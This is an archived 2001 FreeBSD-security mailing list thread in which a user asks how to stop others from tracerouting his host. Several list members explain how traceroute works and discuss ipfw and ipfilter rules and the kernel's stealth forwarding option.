7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i'm reading them as we speak.. thanks for your help:) ----- Original Message ----- From: "Dag-Erling Smorgrav" To: "alexus" Cc: ; Sent: Monday, June 25, 2001 3:34 PM Subject: Re: disable traceroute to my host > "alexus" writes: > > that's what i wanted to do at first place!:) > > > > i didn't know if its possible.. is it? > > We write man pages for a reason. > > DES > -- > Dag-Erling Smorgrav - des@ofug.org > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:47:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 8DA0437B401 for ; Mon, 25 Jun 2001 12:47:56 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 14052 invoked from network); 25 Jun 2001 19:48:43 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 19:48:43 -0000 Message-ID: <015201c0fdaf$c2f5b2c0$9865fea9@book> From: "alexus" To: "Karsten W. Rohrbach" , "Dag-Erling Smorgrav" Cc: References: <20010622230217.JKT10107.mta05.onebox.com@onebox.com> <20010624181614.E52432@mail.webmonster.de> Subject: Re: disable traceroute to my host Date: Mon, 25 Jun 2001 15:48:09 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org heh.. so what's RFC on that? and when are you coming over? ----- Original Message ----- From: "Karsten W. Rohrbach" To: "Dag-Erling Smorgrav" Cc: Sent: Sunday, June 24, 2001 12:16 PM Subject: Re: disable traceroute to my host To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:48:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id AC4EA37B405 for ; Mon, 25 Jun 2001 12:48:30 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 14063 invoked from network); 25 Jun 2001 19:49:19 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 19:49:19 -0000 Message-ID: <016001c0fdaf$d7e929a0$9865fea9@book> From: "alexus" To: "Karsten W. Rohrbach" , "Simon Rakovec" Cc: References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> <20010624203440.C57877@mail.webmonster.de> Subject: Re: disable traceroute to my host Date: Mon, 25 Jun 2001 15:48:44 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i agree shutdown now is best choice:) ----- Original Message ----- From: "Karsten W. Rohrbach" To: "Simon Rakovec" Cc: Sent: Sunday, June 24, 2001 2:34 PM Subject: Re: disable traceroute to my host To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:49:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 3D66337B405 for ; Mon, 25 Jun 2001 12:49:12 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 14093 invoked from network); 25 Jun 2001 19:50:00 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 19:50:00 -0000 Message-ID: <016a01c0fdaf$f0aeb720$9865fea9@book> From: "alexus" To: , "Dag-Erling Smorgrav" References: <20010622230217.JKT10107.mta05.onebox.com@onebox.com> Subject: Re: disable traceroute to my host Date: Mon, 25 Jun 2001 15:49:26 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i'm thinkin to disable ttl=1 .. would that be ok with you? ----- Original Message ----- From: "Dag-Erling Smorgrav" To: Sent: Sunday, June 24, 2001 11:10 AM Subject: Re: disable traceroute to my host > "Kris Anderson" writes: > > You can put in a rule like > > > > ipfw add 3 deny icmp from any to FF.FF.FF.FF via F0 > > [...] > > AUUUUGH! > > First - the only one who got it right is Brooks Davis: no, it can't be > done. The best you can hope for is to prevent your own box (and > anything behind it, if it's a gateway) from responding to certain > specific types of traces, but the tracer will still be able to see > most of the route between you and him, and there are ways of tracing a > route that you can't block without also blocking a lot of legitimate > traffic. > > Second - traceroute is pretty harmless, and not really the corner- > stone of 3v1l h4ckd0m you people seem to think it is, so even if you > could prevent anyone from tracerouting you it wouldn't make much (or > even any) difference to an attacker's ability to harm you. > > Third - if you set up ipfw to unconditionally block ICMP (whether in > the mistaken belief that it will prevent route tracing or for some > other lameass reason), I will personally buy a very heavy baseball > bat, hop on a plane, and pay you a visit you'll remember for the rest > of your very short lives. Although some ICMP types are admittedly not > very useful, that doesn't mean none of them are, and you should at the > very least let types 3 and 11 through or you'll be very sorry. I > usually set up my filters to let 0, 3, 8 and 11 through and block > everything else. > > Fourth - this subject has been discussed to death on this very list > several times in the past. We keep searchable archives for a reason. > > Fifth - someone mentioned stealth routing. There's no such thing in > FreeBSD, but there's something called stealth forwarding, which I > wrote*, and which makes the TCP/IP stack neither decrement nor even > inspect the TTL on forwarded packets, so if someone traceroutes a host > behind you you won't show up in the trace, but if someone traceroutes > you it'll be business as usual. You need to add the IPSTEALTH option > to your kernel to enable support for this (and toggle a sysctl > variable to actually turn stealth forwarding on). > > DES > -- > Dag-Erling Smorgrav - des@ofug.org > > * It went a bit like this: Friend: "Sun have this new firewall product > that's really cool, it can do blah blah blah" - Me: "Oh, FreeBSD can > do that" - Friend: "No, it can't" - Me: "Yes, it can" - Friend: "No > it can't, because blah blah blah" - Me: "Oh, I see" > "Now FreeBSD can do that too" - Friend: > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:50:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 8AED337B406 for ; Mon, 25 Jun 2001 12:50:31 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 14140 invoked from network); 25 Jun 2001 19:51:19 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 19:51:19 -0000 Message-ID: <017a01c0fdb0$1ff51240$9865fea9@book> From: "alexus" To: "Igor Podlesny" Cc: , References: <006a01c0fb6b$2d64d830$9865fea9@book> <13760134158.20010623111308@morning.ru> Subject: Re: disable traceroute to my host Date: Mon, 25 Jun 2001 15:50:45 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org thanks a lot for this whole explanation, i appreciate everyone on the list for taking time to explain how basics works.. i'm trying to read books, manuals, internet for all those things but not everything makes sense, although when real person explains it helps me a lot better thanks everyone ----- Original Message ----- From: "Igor Podlesny" To: "alexus" Cc: ; Sent: Saturday, June 23, 2001 12:13 AM Subject: Re: disable traceroute to my host > > > is it possible to disable using ipfw so people won't be able to traceroute > > me? > > Yes, of course. > > You should know how do traceroute-like utilities work. > > The knowledge can be easily extracted from a lot of sources, for e.g. > from Internet, cause you seem to be connected ;) but, it also should > be mentioned that man pages coming with FreeBSD (I guess as well as > with other *NIX-likes OSes) also describe the algo. > > so man traceroute says, that it uses udp ports starting with 33434 and > goes up with every new hop. but this could be easily changed with -p > option. Besides, windows' tracert works using icmp proto, so the > decision isn't here. It lies in what does the box do when answering to > them. It does send 'time exceeded in-transit' icmp message cause TTL > value is set too low to let the packet jump forward. So it is the > answer -- you should disallow it with your ipfw. for e.g. using such > syntax: > > deny icmp from any to any icmptype 11 > > (yeah, you should carefully think about whether or not to use ANY > cause if you're box is a gateway other people will notice your > cutting-edge knowledge cause it will hide not only your host ;) > > This is not the end, alas. unix traceroute will wait for port unreach > icmp so after meeting, it stops and displays the end-point of your > trace. Windows' tracert will wait for normal icmp-echo-reply for the > same purpose. So if you also wish to hide the end point, you need to > disallow this also. I bet you can figure out the way how by yourself, > now. > > P.S. there are also other ways (even more elegant) of doing that in > practice... they called 'stealth routing' and can be implemented via > FreeBSD kernel mechanism (sysctl + built-in kernel support) or with > ipf (ipfilter) > > read the man pages, man, they are freely available... > > -- > Igor mailto:poige@morning.ru > http://poige.nm.ru > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:52:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 27C1C37B401 for ; Mon, 25 Jun 2001 12:52:39 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 14186 invoked from network); 25 Jun 2001 19:53:27 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 19:53:27 -0000 Message-ID: <018601c0fdb0$6c00b130$9865fea9@book> From: "alexus" To: "Peter Pentchev" , "Fernando Gleiser" Cc: References: <006a01c0fb6b$2d64d830$9865fea9@book> <20010622221554.K5703-100000@cactus.fi.uba.ar> <20010623143419.A29940@ringworld.oblivion.bg> Subject: Re: disable traceroute to my host Date: Mon, 25 Jun 2001 15:52:53 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i can't just block whole icmp .. or udp.. i just can't.. i only wanted to block certain range,type whatever was that just for traceroute .. but i was thinking .. and yes I won't gain much (infact nothing) so ... the max thing i'll do is disable ttl=1.. this should cover the trick.. ----- Original Message ----- From: "Peter Pentchev" To: "Fernando Gleiser" Cc: "alexus" ; Sent: Saturday, June 23, 2001 7:34 AM Subject: Re: disable traceroute to my host > On Fri, Jun 22, 2001 at 10:23:30PM -0300, Fernando Gleiser wrote: > > On Fri, 22 Jun 2001, alexus wrote: > > > > > is it possible to disable using ipfw so people won't be able to traceroute > > > me? > > > > I don't know if it is posible with ipfw, but with ip filter you can add > > a rule to block any packets with ttl=1: > > > > block in log quick on xl0 ttl 1 proto ip all > > > > That will stop windows traceroute (icmp based) as well as unix traceroute > > (udp based). > > > > Unix traceroute uses udp packets with destination port > 33434, but this can > > be changed. As far as I know, the only way to stop traceroute is to drop > > any packet with ttl=1. This might block legitimate trafic, but I haven't > > seen any packet in the wild with ttl=1 wich was not a traceroute. > > This shall only stop traceroutes destined for this particular machine. > If you tried this on a firewall/gateway machine, it would block the response > from the gateway itself, but the internal machines would still respond. > > The response from Igor Podlesny in the thread contains a much more > effective approach, which might block a bit too much, but it would > certainly block traceroutes. > > Oh and BTW, blocking all packets with ttl=1 could block some legitimate > packets that have simply gone down the long and winding road, and stopped > at too many auberges to rest along the way :) > > G'luck, > Peter > > -- > If wishes were fishes, the antecedent of this conditional would be true. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:55:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id CBEF537B406 for ; Mon, 25 Jun 2001 12:55:39 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 14256 invoked from network); 25 Jun 2001 19:56:28 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 19:56:28 -0000 Message-ID: <01a401c0fdb0$d790b3f0$9865fea9@book> From: "alexus" To: "Jewfish" , "Igor Podlesny" Cc: , References: <006a01c0fb6b$2d64d830$9865fea9@book> <13760134158.20010623111308@morning.ru> <3B34EEC8.9010606@jewfish.net> Subject: Re: disable traceroute to my host Date: Mon, 25 Jun 2001 15:55:53 -0400 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_01A1_01C0FD8F.505F08D0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_01A1_01C0FD8F.505F08D0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable is there any place on internet where all protocols desicrbed .. like = icmp and all types of icmps? i'd love to read about that ----- Original Message -----=20 From: Jewfish=20 To: Igor Podlesny=20 Cc: alexus ; freebsd-security@FreeBSD.ORG ; freebsd-isp@FreeBSD.ORG=20 Sent: Saturday, June 23, 2001 3:32 PM Subject: Re: disable traceroute to my host These are the rules I have come up with on my own firewall to disable = tracerouting and pinging (something which might not be for everybody), = but allows me to traceroute and pring from the host and recieve all the = responses: allow icmp from any to any in recv ep0 icmptype 0,3,11,14,16,18 allow icmp from any to any out xmit ep0 icmptype 8 ep0 being, of course, my external interface. This seems to qork quite = well for me. Some other ideas were brought up about denying the = "time-to-live-exceeded" icmptype (11) because of packets that may take a = long time to reach the host. However, this is the easiest method I = could come up with using firewall rules. Obviously, these rules also deny ping traffic, which is not = recommended for everyone. However, I have recently gotten a lot of ping = floods, so I enacted this (possibly on a temporary basis) to deal with = this, while still allowing me to ping out (icmptype 8) and recieve the = replies (icmptype 0). James Igor Podlesny wrote: is it possible to disable using ipfw so people won't be able to = tracerouteme? Yes, of course.You should know how do traceroute-like utilities work.The = knowledge can be easily extracted from a lot of sources, for e.g.from = Internet, cause you seem to be connected ;) but, it also shouldbe = mentioned that man pages coming with FreeBSD (I guess as well aswith = other *NIX-likes OSes) also describe the algo.so man traceroute says, = that it uses udp ports starting with 33434 andgoes up with every new = hop. but this could be easily changed with -poption. Besides, windows' = tracert works using icmp proto, so thedecision isn't here. It lies = in what does the box do when answering tothem. It does send 'time = exceeded in-transit' icmp message cause TTLvalue is set too low to = let the packet jump forward. So it is theanswer -- you should disallow = it with your ipfw. for e.g. using suchsyntax:deny icmp from any to any = icmptype 11(yeah, you shou! ld carefully think about whether or not to use ANYcause if you're = box is a gateway other people will notice yourcutting-edge = knowledge cause it will hide not only your host ;)This is not the end, = alas. unix traceroute will wait for port unreachicmp so after = meeting, it stops and displays the end-point of yourtrace. Windows' = tracert will wait for normal icmp-echo-reply for thesame purpose. So = if you also wish to hide the end point, you need todisallow this also. = I bet you can figure out the way how by yourself,now.P.S. there are = also other ways (even more elegant) of doing that inpractice... they = called 'stealth routing' and can be implemented viaFreeBSD kernel = mechanism (sysctl + built-in kernel support) or withipf (ipfilter)read = the man pages, man, they are freely available... ------=_NextPart_000_01A1_01C0FD8F.505F08D0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
is there any place on internet where all protocols = desicrbed=20 .. like icmp and all types of icmps?  i'd love to read about=20 that
----- Original Message -----
From:=20 Jewfish=20
Cc: alexus ; freebsd-security@FreeBSD.ORG= ;=20 freebsd-isp@FreeBSD.ORG =
Sent: Saturday, June 23, 2001 = 3:32=20 PM
Subject: Re: disable traceroute = to my=20 host

These are the rules I have come up with on my own = firewall to=20 disable tracerouting and pinging (something which might not be for = everybody),=20 but allows me to traceroute and pring from the host and recieve all = the=20 responses:

allow icmp from any to any in recv ep0 icmptype=20 0,3,11,14,16,18
allow icmp from any to any out xmit ep0 icmptype=20 8

ep0 being, of course, my external interface.  This seems = to qork=20 quite well for me.  Some other ideas were brought up about = denying the=20 "time-to-live-exceeded" icmptype (11) because of packets that may take = a long=20 time to reach the host.  However, this is the easiest method I = could come=20 up with using firewall rules.

Obviously, these rules also deny = ping=20 traffic, which is not recommended for everyone.  However, I have = recently=20 gotten a lot of ping floods, so I enacted this (possibly on a = temporary basis)=20 to deal with this, while still allowing me to ping out (icmptype 8) = and=20 recieve the replies (icmptype 0).

James

Igor Podlesny = wrote:
is it possible to disable =
using ipfw so people won't be able to =
traceroute
me?

Yes, =
of course.

You should know how do traceroute-like utilities =
work.

The  knowledge can be easily extracted from a lot of =
sources, for e.g.
from  Internet,  cause you seem to be connected ;) =
but, it also should
be  mentioned  that  man pages coming with =
FreeBSD (I guess as well as
with other *NIX-likes OSes) also describe =
the algo.

so man traceroute says, that it uses udp ports starting =
with 33434 and
goes  up  with every new hop. but this could be easily =
changed with -p
option.  Besides,  windows'  tracert  works  using  =
icmp proto, so the
decision isn't here. It lies in what does the box =
do when answering to
them.  It  does send 'time exceeded in-transit' =
icmp message cause TTL
value  is  set  too  low  to let the packet =
jump forward. So it is the
answer  --  you should disallow it with =
your ipfw. for e.g. using such
syntax:

deny icmp from any to =
any icmptype 11

(yeah,  you  shou!
 ld  carefully  think  about whether or not to use ANY
cause  if  =
you're  box  is  a  gateway  other  people will notice =
your
cutting-edge knowledge cause it will hide not only your host =
;)

This  is not the end, alas. unix traceroute will wait for port =
unreach
icmp  so  after  meeting,  it stops and displays the =
end-point of your
trace.  Windows'  tracert will wait for normal =
icmp-echo-reply for the
same  purpose.  So if you also wish to hide =
the end point, you need to
disallow  this also. I bet you can figure =
out the way how by yourself,
now.

P.S.  there  are  also other =
ways (even more elegant) of doing that in
practice...  they  called =
'stealth routing' and can be implemented via
FreeBSD  kernel  =
mechanism  (sysctl + built-in kernel support) or with
ipf =
(ipfilter)

read the man pages, man, they are freely =
available...


------=_NextPart_000_01A1_01C0FD8F.505F08D0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:56:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 2B8D437B407 for ; Mon, 25 Jun 2001 12:56:07 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 14281 invoked from network); 25 Jun 2001 19:56:55 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 19:56:55 -0000 Message-ID: <01ae01c0fdb0$e7eb8fe0$9865fea9@book> From: "alexus" To: "Brian" , "Jewfish" , "Igor Podlesny" Cc: , References: <006a01c0fb6b$2d64d830$9865fea9@book> <13760134158.20010623111308@morning.ru> <3B34EEC8.9010606@jewfish.net> <003d01c0fc30$053716a0$3324200a@sonicboom.org> Subject: Re: disable traceroute to my host Date: Mon, 25 Jun 2001 15:56:21 -0400 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_01AB_01C0FD8F.60AF3660" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_01AB_01C0FD8F.60AF3660 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable well basically i wanted to block all traceroute .. wither its windows or = unix ----- Original Message -----=20 From: Brian=20 To: Jewfish ; Igor Podlesny=20 Cc: alexus ; freebsd-security@FreeBSD.ORG ; freebsd-isp@FreeBSD.ORG=20 Sent: Saturday, June 23, 2001 6:01 PM Subject: Re: disable traceroute to my host Arent u leaving out some details, like for example windows tracert is = icmp based, whereas unix traces are udp.. Bri ----- Original Message -----=20 From: Jewfish=20 To: Igor Podlesny=20 Cc: alexus ; freebsd-security@FreeBSD.ORG ; freebsd-isp@FreeBSD.ORG=20 Sent: Saturday, June 23, 2001 12:32 PM Subject: Re: disable traceroute to my host These are the rules I have come up with on my own firewall to = disable tracerouting and pinging (something which might not be for = everybody), but allows me to traceroute and pring from the host and = recieve all the responses: allow icmp from any to any in recv ep0 icmptype 0,3,11,14,16,18 allow icmp from any to any out xmit ep0 icmptype 8 ep0 being, of course, my external interface. This seems to qork = quite well for me. Some other ideas were brought up about denying the = "time-to-live-exceeded" icmptype (11) because of packets that may take a = long time to reach the host. However, this is the easiest method I = could come up with using firewall rules. Obviously, these rules also deny ping traffic, which is not = recommended for everyone. However, I have recently gotten a lot of ping = floods, so I enacted this (possibly on a temporary basis) to deal with = this, while still allowing me to ping out (icmptype 8) and recieve the = replies (icmptype 0). James Igor Podlesny wrote: is it possible to disable using ipfw so people won't be able to = tracerouteme? Yes, of course.You should know how do traceroute-like utilities work.The = knowledge can be easily extracted from a lot of sources, for e.g.from = Internet, cause you seem to be connected ;) but, it also shouldbe = mentioned that man pages coming with FreeBSD (I guess as well aswith = other *NIX-likes OSes) also describe the algo.so man traceroute says, = that it uses udp ports starting with 33434 andgoes up with every new = hop. but this could be easily changed with -poption. Besides, windows' = tracert works using icmp proto, so thedecision isn't here. It lies = in what does the box do when answering tothem. It does send 'time = exceeded in-transit' icmp message cause TTLvalue is set too low to = let the packet jump forward. So it is theanswer -- you should disallow = it with your ipfw. for e.g. using suchsyntax:deny icmp from any to any = icmptype 11(yeah, you shou! ld carefully think about whether or not to use ANYcause if you're = box is a gateway other people will notice yourcutting-edge = knowledge cause it will hide not only your host ;)This is not the end, = alas. unix traceroute will wait for port unreachicmp so after = meeting, it stops and displays the end-point of yourtrace. Windows' = tracert will wait for normal icmp-echo-reply for thesame purpose. So = if you also wish to hide the end point, you need todisallow this also. = I bet you can figure out the way how by yourself,now.P.S. there are = also other ways (even more elegant) of doing that inpractice... they = called 'stealth routing' and can be implemented viaFreeBSD kernel = mechanism (sysctl + built-in kernel support) or withipf (ipfilter)read = the man pages, man, they are freely available... ------=_NextPart_000_01AB_01C0FD8F.60AF3660 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
well basically i wanted to block all traceroute .. = wither its=20 windows or unix
----- Original Message -----
From:=20 Brian
Cc: alexus ; freebsd-security@FreeBSD.ORG= ;=20 freebsd-isp@FreeBSD.ORG =
Sent: Saturday, June 23, 2001 = 6:01=20 PM
Subject: Re: disable traceroute = to my=20 host

Arent u leaving out some details, = like for=20 example windows tracert is icmp based, whereas unix traces are=20 udp..
 
    Bri
----- Original Message -----
From:=20 Jewfish=20
Cc: alexus ; freebsd-security@FreeBSD.ORG= =20 ; freebsd-isp@FreeBSD.ORG =
Sent: Saturday, June 23, 2001 = 12:32=20 PM
Subject: Re: disable = traceroute to my=20 host

These are the rules I have come up with on my own = firewall to=20 disable tracerouting and pinging (something which might not be for=20 everybody), but allows me to traceroute and pring from the host and = recieve=20 all the responses:

allow icmp from any to any in recv ep0 = icmptype=20 0,3,11,14,16,18
allow icmp from any to any out xmit ep0 icmptype=20 8

ep0 being, of course, my external interface.  This = seems to=20 qork quite well for me.  Some other ideas were brought up about = denying=20 the "time-to-live-exceeded" icmptype (11) because of packets that = may take a=20 long time to reach the host.  However, this is the easiest = method I=20 could come up with using firewall rules.

Obviously, these = rules also=20 deny ping traffic, which is not recommended for everyone. =  However, I=20 have recently gotten a lot of ping floods, so I enacted this = (possibly on a=20 temporary basis) to deal with this, while still allowing me to ping = out=20 (icmptype 8) and recieve the replies (icmptype = 0).

James

Igor=20 Podlesny wrote:
is it possible to disable =
using ipfw so people won't be able to =
traceroute
me?

Yes, =
of course.

You should know how do traceroute-like utilities =
work.

The  knowledge can be easily extracted from a lot of =
sources, for e.g.
from  Internet,  cause you seem to be connected ;) =
but, it also should
be  mentioned  that  man pages coming with =
FreeBSD (I guess as well as
with other *NIX-likes OSes) also describe =
the algo.

so man traceroute says, that it uses udp ports starting =
with 33434 and
goes  up  with every new hop. but this could be easily =
changed with -p
option.  Besides,  windows'  tracert  works  using  =
icmp proto, so the
decision isn't here. It lies in what does the box =
do when answering to
them.  It  does send 'time exceeded in-transit' =
icmp message cause TTL
value  is  set  too  low  to let the packet =
jump forward. So it is the
answer  --  you should disallow it with =
your ipfw. for e.g. using such
syntax:

deny icmp from any to =
any icmptype 11

(yeah,  you  shou!
 ld  carefully  think  about whether or not to use ANY
cause  if  =
you're  box  is  a  gateway  other  people will notice =
your
cutting-edge knowledge cause it will hide not only your host =
;)

This  is not the end, alas. unix traceroute will wait for port =
unreach
icmp  so  after  meeting,  it stops and displays the =
end-point of your
trace.  Windows'  tracert will wait for normal =
icmp-echo-reply for the
same  purpose.  So if you also wish to hide =
the end point, you need to
disallow  this also. I bet you can figure =
out the way how by yourself,
now.

P.S.  there  are  also other =
ways (even more elegant) of doing that in
practice...  they  called =
'stealth routing' and can be implemented via
FreeBSD  kernel  =
mechanism  (sysctl + built-in kernel support) or with
ipf =
(ipfilter)

read the man pages, man, they are freely =
available...


------=_NextPart_000_01AB_01C0FD8F.60AF3660-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:59:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id DDD4137B401 for ; Mon, 25 Jun 2001 12:59:49 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 14388 invoked from network); 25 Jun 2001 20:00:38 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 20:00:38 -0000 Message-ID: <01ec01c0fdb1$6c9cada0$9865fea9@book> From: "alexus" To: "Peter Pentchev" , "Simon Rakovec" Cc: References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> <20010625093731.A934@ringworld.oblivion.bg> Subject: Re: disable traceroute to my host Date: Mon, 25 Jun 2001 16:00:03 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i agree this is not a solution.. looks like tty=1 is best solution so far thanks though ----- Original Message ----- From: "Peter Pentchev" To: "Simon Rakovec" Cc: Sent: Monday, June 25, 2001 2:37 AM Subject: Re: disable traceroute to my host > On Sun, Jun 24, 2001 at 07:42:19PM +0200, Simon Rakovec wrote: > > Try this: > > > > ipfw add deny udp from any 32769-65535 to 33434-33523 > > As Karsten noted in a followup, this is not proper network practice. > There might be a LOT of things listening on those UDP ports, including > ephemeral outgoing UDP connections. > > As many other people noted, this does not stop Windows traceroute, > which goes via ICMP. > > As the traceroute(8) manpage notes, this does not stop people who > know how to use the traceroute '-p port' option to select a starting > port != 32768. > > As Dag-Erling Smoerdgrav noted, in general it is impossible to disable > a person determined to traceroute you, and in practice, there is > no need to. > > G'luck, > Peter > > PS. How was that now... one source: plagiarism, two sources: comparative > study, three sources: an academic thesis.. I did even better than that! ;) > > -- > Thit sentence is not self-referential because "thit" is 